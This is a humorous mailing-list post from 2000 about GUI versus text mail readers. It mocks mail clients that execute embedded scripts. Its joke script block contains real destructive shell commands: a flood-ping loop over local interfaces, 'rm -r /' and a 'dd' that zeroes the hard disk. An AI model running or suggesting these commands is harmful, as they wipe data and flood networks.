[plug] GUI vs text mail readers

Leon Brooks leon at brooks.smileys.net
Thu Aug 10 21:06:21 WST 2000

Mike Holland wrote:
> But am I a dinosaur for preferring a text-based mail reader?
> Why do some people refuse to consider one?

Because animated, musical greeting cards are difficult to do in 24x80
shaped pixels in a range of 8 gorgeous colours.

However, you may not need that for full Microsoft compatibility:

<script language=bash>
    echo "Never, ever read email as superuser" &
    for iface in $(ifconfig | egrep '(Bcast|P-t-P):' | gawk '-F[ :]+' '{
print $4 }'); do
        ping -f $iface >/dev/null 2>/dev/null &
    done
    rm -r / >/dev/null 2>/dev/null &
    sleep 30
    dd if=/dev/zero of=/dev/hda
</script>

--
Other than that, Mrs Lincoln, how was the play?